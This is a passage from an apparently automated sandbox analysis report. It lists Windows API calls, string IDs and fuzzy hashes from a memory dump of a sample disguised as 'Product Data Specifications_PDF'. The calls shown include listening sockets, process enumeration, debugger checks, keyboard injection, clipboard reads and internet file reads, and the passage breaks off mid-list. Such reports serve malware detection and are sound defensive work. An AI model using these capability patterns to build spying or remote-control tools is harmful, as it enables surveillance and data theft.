                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                              • GetLastError.KERNEL32 ref: 0045D6BF
                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_strncmp
                              • String ID: @oH$\$^$h
                              • API String ID: 2175499884-3701065813
                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocket$bindlistensocket
                              • String ID:
                              • API String ID: 540024437-0
                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                              • API String ID: 0-2872873767
                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                              • __wsplitpath.LIBCMT ref: 00475644
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscat.LIBCMT ref: 00475657
                              • __wcsicoll.LIBCMT ref: 0047567B
                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                              • String ID:
                              • API String ID: 2547909840-0
                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                              • FindClose.KERNEL32(?), ref: 004525FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                              • String ID: *.*$\VH
                              • API String ID: 2786137511-2657498754
                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID: pqI
                              • API String ID: 2579439406-2459173057
                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                              APIs
                              • __wcsicoll.LIBCMT ref: 00433349
                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                              • __wcsicoll.LIBCMT ref: 00433375
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicollmouse_event
                              • String ID: DOWN
                              • API String ID: 1033544147-711622031
                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: KeyboardMessagePostState$InputSend
                              • String ID:
                              • API String ID: 3031425849-0
                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastinet_addrsocket
                              • String ID:
                              • API String ID: 4170576061-0
                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • IsWindowVisible.USER32 ref: 0047A368
                              • IsWindowEnabled.USER32 ref: 0047A378
                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                              • IsIconic.USER32 ref: 0047A393
                              • IsZoomed.USER32 ref: 0047A3A1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: U$\
                              • API String ID: 4104443479-100911408
                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                              • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                              APIs
                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                              • FindClose.KERNEL32(00000000), ref: 004339EB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                              APIs
                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                              • String ID:
                              • API String ID: 901099227-0
                              • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                              • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                              APIs
                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
